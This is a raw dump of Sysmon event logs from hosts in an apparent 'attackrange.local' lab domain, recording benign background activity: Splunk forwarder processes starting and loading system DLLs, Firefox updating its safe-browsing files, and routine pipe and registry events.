734700x800000000000000057350365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057350361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.192{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000057350358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpset2021-11-12 12:19:09.191 11241100x800000000000000057350357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.metadata2021-11-12 12:19:09.191 11241100x800000000000000057350356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpset2021-11-12 12:19:09.191 11241100x800000000000000057350355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.metadata2021-11-12 12:19:09.191 11241100x800000000000000057350354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpset2021-11-12 12:19:09.191 11241100x800000000000000057350353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.191{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadata2021-11-12 12:19:09.191 18141800x800000000000000057350352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.191{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.175{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpset2021-11-12 12:19:09.175 11241100x800000000000000057350345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.175{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadata2021-11-12 12:19:09.175 11241100x800000000000000057350344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.175{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google42021-11-12 12:19:09.175 11241100x800000000000000057350343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.175{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpset2021-11-12 12:19:09.175 11241100x800000000000000057350342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.175{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashallow-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flashallow-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flash-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\except-flash-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\content-track-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\content-track-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flash-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\block-flash-digest256.sbstore2021-11-12 12:19:09.160 11241100x800000000000000057350329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.160{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpset2021-11-12 12:19:09.160 11241100x800000000000000057350328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstore2021-11-12 12:19:09.144 11241100x800000000000000057350327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpset2021-11-12 12:19:09.144 11241100x800000000000000057350326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstore2021-11-12 12:19:09.144 11241100x800000000000000057350325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\analytics-track-digest256.vlpset2021-11-12 12:19:09.144 11241100x800000000000000057350324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\analytics-track-digest256.sbstore2021-11-12 12:19:09.144 11241100x800000000000000057350323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpset2021-11-12 12:19:09.144 11241100x800000000000000057350322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstore2021-11-12 12:19:09.144 11241100x800000000000000057350321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\ads-track-digest256.vlpset2021-11-12 12:19:09.144 11241100x800000000000000057350320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\ads-track-digest256.sbstore2021-11-12 12:19:09.144 11241100x800000000000000057350319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.144{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating2021-11-12 12:19:09.144 12241200x800000000000000057350318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:09.075{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057350317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:09.075{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057350316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:09.075{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 10341000x800000000000000021219942Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBE-618E-1BCE-08000000F101}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219941Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219940Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219939Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219938Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219937Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5BBE-618E-1BCE-08000000F101}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219936Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.894{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBE-618E-1BCE-08000000F101}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219935Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.879{AD5E2759-5BBE-618E-1BCE-08000000F101}2600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 